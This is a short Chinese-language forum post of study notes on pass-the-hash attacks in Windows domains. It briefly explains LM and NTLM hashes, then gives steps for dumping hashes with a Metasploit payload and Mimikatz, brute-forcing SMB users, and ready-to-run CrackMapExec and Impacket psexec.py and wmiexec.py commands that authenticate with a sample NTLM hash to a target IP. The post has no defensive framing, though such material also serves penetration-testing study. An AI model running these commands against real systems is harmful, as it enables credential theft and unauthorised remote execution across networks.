PHT攻击

adminyg   ·   发表于 2023-06-19 16:56:33   ·   学习杂记


常见的密码加密
LM HASH
从windows server 2008开始被禁用
NTLM HASH
Windows Server 2003以后的认证方式都为NTLM Hash
域渗透-哈希传递攻击
(Pass The Hash/Key)
首先重要的是获取hash

  1. 上传msf生成的exe进行上传使得靶机上线然后执行hashdump或者run post/windows/gather/smart_hashdump
  2. Mimkatz(kali2021的meterpreter下有自带的mimkatz,如果没有的话也可以去github上下载exe进行使用)
    拓展思路:
    假设windows存在smb用户,那我们可以去尝试使用msf的smb_login模块去枚举用户
    然后找一个hash字典去进行爆破,然后如果有匹配的话我们就可以尝试使用exploit/windows/smb/psexec模块去尝试获取当前用户的执行权限
    攻击手法:
  3. Crackmapexec工具
    crackmapexec smb ip –u 用户 –H 32196B56FFE6F45E294117B91A83BF38
  4. Impacket工具库下的psexec.py
    python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 用户名@ip
  5. Impacket:wmiexec.py
    python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 用户名@ip

打赏我,让我更有动力~

0 条回复   |  直到 2023-6-19 | 369 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.